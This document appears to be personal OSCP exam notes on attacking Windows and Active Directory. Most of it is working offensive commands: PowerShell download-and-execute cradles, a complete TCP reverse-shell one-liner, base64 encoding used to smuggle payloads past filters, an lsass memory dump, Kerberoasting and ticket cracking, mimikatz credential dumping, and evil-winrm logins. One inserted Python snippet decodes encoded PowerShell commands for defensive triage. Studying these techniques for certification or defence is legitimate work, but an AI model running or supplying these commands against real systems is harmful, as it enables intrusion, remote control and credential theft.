OSCP Notes

Windows hacks

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DC_NAME:1433"

Download files with PowerShell:

On Web shell:
IEX (New-Object Net.WebClient).downloadString('
powershell IEX(New-Object Net.WebClient).DownloadFile('http://')
powershell IEX(New-Object Net.WebClient).downloadString('http://')
Transfer mimikatz to a Temp directory:
(New-Object Net.WebClient).DownloadFile("","C:\Windows\Temp\mimikatz.exe")
certutil -urlcache -split -f C:\backup\Scripts\backup_powershell.ps1
powershell IEX(New-Object Net.WebClient).DownloadFile(""),"C:\Windows\Users\Bethany\Documents\mimikatz.exe"
powershell -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString("");Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"\");"

Get-NetDomain -Domain xor.com

$cred = New-Object System.Management.Automation.PSCredential('MSSQLSvc/DC_NAME\user', $secpasswd)

Cool Reverse shell Trick:

Reverse shell not working?
To avoid bad-character issues with the reverse shell script (ps1), first convert it to UTF-16LE (the encoding PowerShell's -enc / -EncodedCommand option expects) and then base64-encode it.
cat reverse.ps1 | iconv -t UTF-16LE | base64 -w0
This converts the script to UTF-16 little-endian and then base64-encodes it.
Copy the resulting string and use it to run the command:
powershell.exe -nop -exec bypass -enc BASE64_COMMANDSSSSSS
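
For triage of a logged `-enc` command line, the encoding described above can be reversed and the decoded script checked for strings seen in these notes. This is an added example, not part of the original notes; the function names, the indicator list and the sample command line are constructed for illustration.

```python
import base64
import binascii
import re

# Indicator strings taken from the commands in these notes (list is an assumption).
INDICATORS = ("net.webclient", "downloadstring", "downloadfile",
              "tcpclient", "invoke-kerberoast", "mimikatz")

# A switch followed by a base64-looking value, e.g. " -enc SQBFAFgA..."
ARG = re.compile(r"\s[-/](\w+)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline):
    """Return the script carried in a PowerShell -enc argument, or None."""
    for flag, blob in ARG.findall(cmdline):
        flag = flag.lower()
        # powershell.exe accepts any prefix of -EncodedCommand, and -ec
        if not ("encodedcommand".startswith(flag) or flag == "ec"):
            continue
        try:
            # Reverse of `iconv -t UTF-16LE | base64 -w0`
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None  # not valid base64, or not UTF-16LE text
    return None


def triage(cmdline):
    """Decode the payload and list the indicators found in it."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return None, []
    lowered = script.lower()
    return script, [i for i in INDICATORS if i in lowered]


def encode_for_test(script):
    """Build sample data the same way the notes do (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample, not a real log line; 192.0.2.10 is a documentation address.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"
SAMPLE_LOG = "powershell.exe -nop -exec bypass -enc " + encode_for_test(SAMPLE_SCRIPT)

if __name__ == "__main__":
    script, hits = triage(SAMPLE_LOG)
    print("decoded:", script)
    print("indicators:", hits)
```

Feed it the command-line field from process-creation logs; a `None` result means no decodable `-enc` argument was present.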

If mimikatz is not working, try a different version (e.g. 2.1).

Dumping lsass

C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 536 C:\Users\administrator.xor\Desktop\lsass.dmp full

Active Directory Workflow (Case Study 1)

1. Obtain SPN data with GetSPN.ps1 (take notes on service names and domain info).
2. Copy nc.exe to the Windows machine and get a stable reverse shell back.
3. Once stable, open PowerShell and run:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "Servicename/domain:port"
4. Open mimikatz (make sure you have the right version for the OS: 32-bit or 64-bit) and dump the Kerberos tickets:
kerberos::list /export
This should dump all the tickets; the results are saved on the victim's computer.
5. Copy the file over to Kali and convert it to hashcat form with kirbi2john.py.
Cracking a ticket:
python3 /home/kali/Downloads/kerberoast-master/tgsrepcrack.py ~/rockyou.txt kirby.kirby
6. Once cracked, you can try to log in to the account with evil-winrm (use the service name you obtained in step 1):
❯ ./evil-winrm.rb -i IP -u User -p PASS

Look for plaintext passwords

Mimikatz console (multiple commands)
PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug
mimikatz # log
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest
# lsadump::sam
mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
mimikatz cheatsheet:
and use psexec.py or evil-winrm to get into the admin shell.